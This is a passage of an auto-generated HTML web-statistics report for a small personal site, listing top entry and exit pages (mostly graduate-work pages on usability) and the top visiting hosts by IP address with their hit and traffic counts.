ALIGN=right><FONT SIZE="-2">2.70%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.02%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/js/script.js">/js/script.js</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPENTRY"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 5 of 5 Total Entry Pages</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>202</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>167</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">63.74%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>42</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">16.03%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityEngineering.php">/gradWork/usabilityEngineering.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.25%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/">/gradWork/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.87%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityTesting.php">/gradWork/usabilityTesting.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.11%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/ucd.php">/gradWork/ucd.php</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPEXIT"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=6>Top 5 of 5 Total Exit Pages</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">URL</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>202</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">11.60%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>164</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">63.32%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/">/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>59</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.39%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>44</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">16.99%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityEngineering.php">/gradWork/usabilityEngineering.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/usabilityTesting.php">/gradWork/usabilityTesting.php</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.67%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">6.95%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/">/gradWork/</A></FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.41%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1"><A HREF="http://hazydesignscom.fatcow.com/gradWork/ucd.php">/gradWork/ucd.php</A></FONT></TD></TR> <TR><TH HEIGHT=4></TH></TR> </TABLE> <P> <A NAME="TOPSITES"></A> <TABLE WIDTH=510 BORDER=2 CELLSPACING=1 CELLPADDING=1> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=CENTER COLSPAN=10>Top 50 of 348 Total Sites</TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR><TH BGCOLOR="#C0C0C0" ALIGN=center><FONT SIZE="-1">#</FONT></TH> <TH BGCOLOR="#008040" ALIGN=center COLSPAN=2><FONT SIZE="-1">Hits</FONT></TH> <TH BGCOLOR="#0080FF" ALIGN=center COLSPAN=2><FONT SIZE="-1">Files</FONT></TH> <TH BGCOLOR="#FF0000" ALIGN=center COLSPAN=2><FONT SIZE="-1">KBytes</FONT></TH> <TH BGCOLOR="#FFFF00" ALIGN=center COLSPAN=2><FONT SIZE="-1">Visits</FONT></TH> <TH BGCOLOR="#00E0FF" ALIGN=center><FONT SIZE="-1">Hostname</FONT></TH></TR> <TR><TH HEIGHT=4></TH></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>88</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.05%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>35</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.36%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1512</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.77%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.01%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">67.249.85.131</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>64</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.68%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>38</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.04%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">178.210.65.38</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>3</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>63</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>49</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.30%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>4652</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">5.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.67%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">24.97.181.182</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>4</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>50</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>47</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.17%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>176</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.21%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">7.74%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">199.21.99.76</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>5</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>37</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.13%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>36</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2614</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">3.06%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">171.99.249.130</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>6</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>33</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1640</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.92%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">110.74.199.4</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>7</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>32</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.84%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.96%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1080</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.26%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">176.249.245.232</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>8</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>31</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.78%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.89%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1625</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.90%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">140.112.39.132</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>9</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">128.118.132.120</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>10</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.61%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.75%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1608</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.88%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">80.169.172.2</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>11</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>2076</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">2.43%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">146.209.159.23</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>12</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">108.123.106.233</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>13</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">109.77.232.229</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>14</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">130.88.64.220</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>15</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.180.140.25</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>16</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">137.222.114.243</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>17</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">150.204.129.181</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>18</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">150.204.130.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>19</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">164.11.203.58</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>20</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">194.80.229.244</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.154.193.1</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.57.45.238</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">74.106.204.134</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.49%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.69%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1593</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">95.34.131.29</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.62%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>871</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.02%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.253.24.25</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>26</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>25</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.44%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1594</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.87%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">165.91.172.212</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>27</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.55%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1592</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.86%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">125.166.96.178</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>28</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>24</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.38%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>22</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.48%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>883</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.03%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">131.227.111.175</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>29</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.42%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>955</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.12%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>1</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">0.34%</FONT></TD> <TD ALIGN=left NOWRAP><FONT SIZE="-1">66.91.104.159</FONT></TD></TR> <TR> <TD ALIGN=center><FONT SIZE="-1"><B>30</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>23</B></FONT></TD> <TD ALIGN=right><FONT SIZE="-2">1.32%</FONT></TD> <TD ALIGN=right><FONT SIZE="-1"><B>21</B></FONT></TD> <TD ALIGN=right><FONT 